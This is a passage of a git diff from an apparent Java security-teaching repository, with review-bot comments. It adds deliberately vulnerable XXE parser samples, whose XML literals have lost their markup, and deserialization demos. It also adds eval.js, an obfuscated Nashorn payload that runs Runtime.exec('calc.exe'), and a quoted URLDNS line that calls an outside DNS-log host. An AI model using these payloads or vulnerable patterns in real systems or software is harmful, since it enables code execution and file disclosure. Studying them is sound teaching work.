+ ByteArrayOutputStream barr = new ByteArrayOutputStream();
+ ObjectOutputStream oos = new ObjectOutputStream(barr);
+ oos.writeObject(ht);
+ oos.close();
+
+ System.out.println(barr);
+ ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
+ Object o = (Object)ois.readObject();
+ }
+}
diff --git a/jdk8/src/main/java/com/govuln/js/Eval.java b/jdk8/src/main/java/com/govuln/js/Eval.java
new file mode 100644
index 0000000..6c11506
--- /dev/null
+++ b/jdk8/src/main/java/com/govuln/js/Eval.java
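Review bot: `String url = "http://dns.675ba661.y7z.xyz"` in URLDNS.main hard-codes one specific DNS-log host, so everyone who runs the demo sends a lookup to that domain and cannot see the result themselves; taking the host from `args` with a labelled default, `String url = args.length > 0 ? args[0] : "http://<your-dns-log-host>";`, lets readers point it at a logging endpoint they control. `ObjectInputStream ois` is never closed and `Object o` is unused, the same pattern as in JDK7u21 in this commit; `try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()))) { ois.readObject(); }` is enough. `SilentURLStreamHandler.openConnection` returning `null` is only safe because nothing in this class ever opens a connection; a comment on that method saying so would avoid a surprise if the handler is reused elsewhere.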
@@ -0,0 +1,20 @@
+package com.govuln.js;
+
+import javax.script.ScriptEngine;
+import javax.script.ScriptEngineManager;
+import java.io.FileReader;
+
+import jdk.nashorn.api.scripting.NashornException;
+import jdk.nashorn.api.scripting.NashornScriptEngine;
+import jdk.nashorn.api.scripting.NashornScriptEngineFactory;
+
+import java.io.InputStream;
+import java.lang.Exception;
+
+public class Eval {
+ public static void main(String[] args) throws Exception {
+ ScriptEngineManager manager = new ScriptEngineManager();
+ ScriptEngine engine = manager.getEngineByName("JavaScript");
+ engine.eval(new FileReader("src/main/resources/eval.js"));
+ }
+}
diff --git a/jdk8/src/main/java/com/govuln/serialization/Converter.java b/jdk8/src/main/java/com/govuln/serialization/Converter.java
new file mode 100644
index 0000000..d3b6ed4
--- /dev/null
+++ b/jdk8/src/main/java/com/govuln/serialization/Converter.java
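Review bot: `engine.eval(new FileReader("src/main/resources/eval.js"))` in Eval.main never closes the reader (`ScriptEngine.eval(Reader)` does not close what it is given), decodes the file with the platform default charset, and resolves the path against the working directory, so it only works when launched from the `jdk8` module root. `try (Reader r = Files.newBufferedReader(Paths.get("src/main/resources/eval.js"), StandardCharsets.UTF_8)) { engine.eval(r); }` addresses the first two and makes the third explicit. `manager.getEngineByName("JavaScript")` returns `null` on JDK 15 and later, where Nashorn was removed, so the next line fails with a bare NPE there; an `Objects.requireNonNull(engine, "no JavaScript engine on this JDK")` or a comment that the demo targets JDK 8–14 would be clearer. The `jdk.nashorn.*`, `InputStream` and `java.lang.Exception` imports are unused.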
@@ -0,0 +1,39 @@
+package com.govuln.serialization;
+
+import java.io.ByteArrayOutputStream;
+import java.io.DataOutputStream;
+import java.io.IOException;
+import java.io.ObjectOutputStream;
+
+public class Converter {
+ public static byte[] toBytes(Object[] objs) throws IOException {
+ ByteArrayOutputStream baos = new ByteArrayOutputStream();
+ DataOutputStream dos = new DataOutputStream(baos);
+ for (Object obj : objs) {
+ treatObject(dos, obj);
+ }
+ dos.close();
+ return baos.toByteArray();
+ }
+
+ public static void treatObject(DataOutputStream dos, Object obj)
+ throws IOException {
+ if (obj instanceof Byte) {
+ dos.writeByte((Byte) obj);
+ } else if (obj instanceof Short) {
+ dos.writeShort((Short) obj);
+ } else if (obj instanceof Integer) {
+ dos.writeInt((Integer) obj);
+ } else if (obj instanceof Long) {
+ dos.writeLong((Long) obj);
+ } else if (obj instanceof String) {
+ dos.writeUTF((String) obj);
+ } else {
+ ByteArrayOutputStream ba = new ByteArrayOutputStream();
+ ObjectOutputStream oos = new ObjectOutputStream(ba);
+ oos.writeObject(obj);
+ oos.close();
+ dos.write(ba.toByteArray(), 4, ba.size() - 4); // 4 = skip the header
+ }
+ }
+}
diff --git a/jdk8/src/main/java/com/govuln/serialization/UserSerialization.java b/jdk8/src/main/java/com/govuln/serialization/UserSerialization.java
new file mode 100644
index 0000000..d20a7af
--- /dev/null
+++ b/jdk8/src/main/java/com/govuln/serialization/UserSerialization.java
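Review bot: `Converter.treatObject` falls through to full Java serialization for every value that is not `Byte`, `Short`, `Integer`, `Long` or `String` — `Boolean`, `Character`, `Float`, `Double` and `byte[]` included — which a caller assembling a hand-built stream from primitives is unlikely to expect, and nothing documents the output format `toBytes` produces. A Javadoc on `toBytes` along the lines of "Concatenates {@code objs}: boxed Byte/Short/Integer/Long are written as big-endian primitives via DataOutput, String as DataOutput.writeUTF (length-prefixed modified UTF-8), and any other object as its Java serialization form with the 4-byte STREAM_MAGIC/STREAM_VERSION header removed" would state that contract, and the `// 4 = skip the header` comment could name those two 2-byte fields. `dos.close()` is not in a `finally`; nothing leaks because the sink is a `ByteArrayOutputStream`, but `try (DataOutputStream dos = new DataOutputStream(baos)) { ... }` is the idiomatic shape. A `null` `objs` currently fails with an NPE from the for-each; `Objects.requireNonNull(objs, "objs")` would make that deliberate.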
@@ -0,0 +1,24 @@
+package com.govuln.serialization;
+
+import com.govuln.serialization.model.User;
+import org.apache.commons.codec.binary.Base64;
+
+import java.io.*;
+
+public class UserSerialization {
+ public static void main(String[] args) throws Exception
+ {
+ write();
+ }
+
+ public static void write() throws Exception
+ {
+ User user = new User("Bob");
+ user.setParent(new User("Josua"));
+ ByteArrayOutputStream byteSteam = new ByteArrayOutputStream();
+ ObjectOutputStream oos = new ObjectOutputStream(byteSteam);
+ oos.writeObject(user);
+
+ System.out.println(Base64.encodeBase64String(byteSteam.toByteArray()));
+ }
+}
diff --git a/jdk8/src/main/java/com/govuln/serialization/model/User.java b/jdk8/src/main/java/com/govuln/serialization/model/User.java
new file mode 100644
index 0000000..bda5098
--- /dev/null
+++ b/jdk8/src/main/java/com/govuln/serialization/model/User.java
@@ -0,0 +1,18 @@
+package com.govuln.serialization.model;
+
+import java.io.Serializable;
+
+public class User implements Serializable {
+ protected String name;
+ protected User parent;
+
+ public User(String name)
+ {
+ this.name = name;
+ }
+
+ public void setParent(User parent)
+ {
+ this.parent = parent;
+ }
+}
diff --git a/jdk8/src/main/java/com/govuln/xxe/DocumentBuilderExample.java b/jdk8/src/main/java/com/govuln/xxe/DocumentBuilderExample.java
new file mode 100644
index 0000000..3111c38
--- /dev/null
+++ b/jdk8/src/main/java/com/govuln/xxe/DocumentBuilderExample.java
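Review bot: In `UserSerialization.write`, `oos` is neither flushed nor closed before `byteSteam.toByteArray()` is encoded and printed; the bytes appear to reach the buffer anyway because ObjectOutputStream drains its block buffer when `writeObject` returns, but that is an implementation detail rather than the documented contract, and JDK7u21 in this same commit does call `oos.close()`. `try (ObjectOutputStream oos = new ObjectOutputStream(byteSteam)) { oos.writeObject(user); }` makes the output complete by contract, and `byteSteam` looks like a typo for `byteStream`. `User` declares no `serialVersionUID`, so its stream id changes whenever the class shape changes; given the README entry about repairing SerialVersionUID mismatches with zkar this is presumably intentional, and a comment on the class saying so (`// no serialVersionUID on purpose: see the zkar mismatch demo`) would keep a linter-driven "fix" from defeating the demo.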
@@ -0,0 +1,18 @@
+package com.govuln.xxe;
+
+import org.w3c.dom.Document;
+import javax.xml.parsers.DocumentBuilder;
+import javax.xml.parsers.DocumentBuilderFactory;
+import java.io.ByteArrayInputStream;
+
+public class DocumentBuilderExample {
+ public static void main(String[] args) throws Exception {
+ String data = "\n" +
+ " ]>\n" +
+ "&xxe;";
+ DocumentBuilder db = DocumentBuilderFactory.newInstance().newDocumentBuilder();
+ Document doc = db.parse(new ByteArrayInputStream(data.getBytes()));
+ System.out.println(doc.getDocumentElement().getTextContent());
+ }
+}
diff --git a/jdk8/src/main/java/com/govuln/xxe/SAXParserExample.java b/jdk8/src/main/java/com/govuln/xxe/SAXParserExample.java
new file mode 100644
index 0000000..46fa054
--- /dev/null
+++ b/jdk8/src/main/java/com/govuln/xxe/SAXParserExample.java
@@ -0,0 +1,23 @@
+package com.govuln.xxe;
+
+import org.xml.sax.helpers.DefaultHandler;
+
+import javax.xml.parsers.SAXParser;
+import javax.xml.parsers.SAXParserFactory;
+import java.io.ByteArrayInputStream;
+
+public class SAXParserExample {
+ public static void main(String[] args) throws Exception {
+ String data = "\n" +
+ " ]>\n" +
+ "&xxe;";
+ SAXParser parser = SAXParserFactory.newInstance().newSAXParser();
+
+ parser.parse(new ByteArrayInputStream(data.getBytes()), new DefaultHandler() {
+ public void characters(char[] ch, int start, int length) {
+ System.out.print(new String(ch, start, length));
+ }
+ });
+ }
+}
diff --git a/jdk8/src/main/java/com/govuln/xxe/XMLReaderExample.java b/jdk8/src/main/java/com/govuln/xxe/XMLReaderExample.java
new file mode 100644
index 0000000..459a222
--- /dev/null
+++ b/jdk8/src/main/java/com/govuln/xxe/XMLReaderExample.java
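Review bot: The DocumentBuilder is obtained from a default DocumentBuilderFactory, so DTD processing and external entity resolution stay enabled and the `&xxe;` reference in `data` is expanded — presumably the point of the demo, but nothing in the file says so. A header comment such as `// Intentionally vulnerable: default JAXP settings resolve external entities (XXE)`, together with the hardened counterpart `DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance(); dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);`, would let the sample show both sides. `data.getBytes()` uses the platform default charset; `data.getBytes(StandardCharsets.UTF_8)` removes that dependency. The XML literal as shown here seems to have lost its markup in extraction, so I cannot check the DOCTYPE itself.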
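Review bot: SAXParserFactory.newInstance() is used with default features, so the DTD in `data` is processed and its external entity is resolved while parsing; if that is the intended demonstration it should be stated in a comment, and if not, keep the factory in a local and set `factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);` before `newSAXParser()`. The anonymous DefaultHandler overrides `characters` without `@Override`, which would hide a signature mismatch silently. `data.getBytes()` should name a charset, e.g. `data.getBytes(StandardCharsets.UTF_8)`.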
@@ -0,0 +1,22 @@
+package com.govuln.xxe;
+
+import org.xml.sax.InputSource;
+import org.xml.sax.XMLReader;
+import org.xml.sax.helpers.DefaultHandler;
+import org.xml.sax.helpers.XMLReaderFactory;
+
+public class XMLReaderExample {
+ public static void main(String[] args) throws Exception {
+ String data = "\n" +
+ " ]>\n" +
+ "&xxe;";
+ XMLReader reader = XMLReaderFactory.createXMLReader();
+ reader.setContentHandler(new DefaultHandler() {
+ public void characters(char[] ch, int start, int length) {
+ System.out.print(new String(ch, start, length));
+ }
+ });
+ reader.parse(new InputSource(data));
+ }
+}
diff --git a/jdk8/src/main/java/com/govuln/xxe/XMLStreamExample.java b/jdk8/src/main/java/com/govuln/xxe/XMLStreamExample.java
new file mode 100644
index 0000000..0173a44
--- /dev/null
+++ b/jdk8/src/main/java/com/govuln/xxe/XMLStreamExample.java
@@ -0,0 +1,28 @@
+package com.govuln.xxe;
+
+import javax.xml.stream.XMLInputFactory;
+import javax.xml.stream.XMLStreamReader;
+import java.io.*;
+
+public class XMLStreamExample {
+ public static void main(String[] args) throws Exception {
+ String data = "\n" +
+ " ]>\n" +
+ "&xxe;";
+ InputStream input = new ByteArrayInputStream(data.getBytes());
+ XMLInputFactory factory = XMLInputFactory.newFactory();
+ XMLStreamReader reader = factory.createXMLStreamReader(input);
+
+ while (reader.hasNext()) {
+ reader.next();
+ if (reader.isStartElement()) {
+ System.out.println("Start: " + reader.getLocalName());
+ } else if (reader.isEndElement()) {
+ System.out.println("End: " + reader.getLocalName());
+ } else if (reader.hasText()) {
+ System.out.println("Data: " + reader.getText().trim());
+ }
+ }
+ }
+}
diff --git a/jdk8/src/main/java/com/govuln/xxe/XPathExpressionExample.java b/jdk8/src/main/java/com/govuln/xxe/XPathExpressionExample.java
new file mode 100644
index 0000000..9b15047
--- /dev/null
+++ b/jdk8/src/main/java/com/govuln/xxe/XPathExpressionExample.java
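Review bot: `reader.parse(new InputSource(data))` passes the XML text to the `InputSource(String systemId)` constructor, which treats its argument as a system identifier (a URI to open), not as document content, so `data` is never parsed as XML and the handler prints nothing useful. The fix is to wrap the string in a reader: `reader.parse(new InputSource(new StringReader(data)));` with `java.io.StringReader` imported. `XMLReaderFactory` is deprecated since Java 9; `SAXParserFactory.newInstance().newSAXParser().getXMLReader()` is the supported route and also exposes a factory on which `disallow-doctype-decl` can be set if this sample is ever meant to show the hardened configuration rather than the vulnerable default.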
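Review bot: XMLInputFactory.newFactory() is used with default properties, so the DTD in `data` is processed and the JDK's StAX implementation may expand the external entity; if the sample is meant to show that, say so in a comment, and the hardened variant is two properties on the factory: `factory.setProperty(XMLInputFactory.SUPPORT_DTD, false); factory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);`. `reader.hasText()` is also true for DTD, COMMENT and SPACE events, so the `Data:` branch can print more than element text; `reader.isCharacters()` is the narrower check if only character data is wanted. `data.getBytes()` depends on the platform charset.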
@@ -0,0 +1,22 @@
+package com.govuln.xxe;
+
+import org.xml.sax.InputSource;
+import javax.xml.xpath.XPath;
+import javax.xml.xpath.XPathExpression;
+import javax.xml.xpath.XPathFactory;
+import java.io.ByteArrayInputStream;
+
+public class XPathExpressionExample {
+ public static void main(String[] args) throws Exception {
+ String data = "\n" +
+ " ]>\n" +
+ "&xxe;";
+ XPathFactory xPathFactory = XPathFactory.newInstance();
+ XPath xpath = xPathFactory.newXPath();
+ XPathExpression xPathExpr = xpath.compile("/foo/text()");
+
+ String result = xPathExpr.evaluate(new InputSource(data));
+ System.out.println(result);
+ }
+}
diff --git a/general/src/main/java/evil/EvilTemplatesImpl.java b/jdk8/src/main/java/evil/EvilTemplatesImpl.java
similarity index 100%
rename from general/src/main/java/evil/EvilTemplatesImpl.java
rename to jdk8/src/main/java/evil/EvilTemplatesImpl.java
diff --git a/general/src/main/java/evil/Hello.java b/jdk8/src/main/java/evil/Hello.java
similarity index 100%
rename from general/src/main/java/evil/Hello.java
rename to jdk8/src/main/java/evil/Hello.java
diff --git a/jdk8/src/main/resources/eval.js b/jdk8/src/main/resources/eval.js
new file mode 100644
index 0000000..f80f6b6
--- /dev/null
+++ b/jdk8/src/main/resources/eval.js
@@ -0,0 +1,4 @@
+var a = new java.beans.Customizer {
+ setObject: eval
+}
+a.object = "java.lang.Runtime.getRuntime\50\51.exec\50'calc.exe'\51";
\ No newline at end of file
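Review bot: `xPathExpr.evaluate(new InputSource(data))` hands the XML text to `InputSource(String systemId)`, so it is interpreted as a URI to fetch rather than as the document, and the evaluation cannot see the `&xxe;` content it is meant to extract; use `new InputSource(new StringReader(data))` with `java.io.StringReader` imported. Evaluating against an InputSource makes the XPath implementation parse the source with a DOM parser it configures itself, and javax.xml.xpath offers no switch for entity handling, so if this path is ever to be hardened the document should be parsed first through a DocumentBuilderFactory with `disallow-doctype-decl` set and the resulting `Document` passed to `xPathExpr.evaluate(doc)`. `java.io.ByteArrayInputStream` is imported but unused in this hunk.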
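Review bot: The resource carries no comment explaining its two tricks: `new java.beans.Customizer { setObject: eval }` relies on the hosting script engine (presumably Nashorn) turning an object literal into an implementation of a Java interface, and `\50`/`\51` are octal escapes for `(`/`)`, so assigning `a.object` ends up passing `java.lang.Runtime.getRuntime().exec('calc.exe')` to eval. A two-line header comment stating that, and that the octal escapes presumably exist to keep literal parentheses out of the source, would make the sample self-explanatory for a reader who does not know the Nashorn interface-coercion idiom. Octal escape sequences are a SyntaxError in strict-mode ECMAScript, so the file must not be evaluated under `"use strict"`.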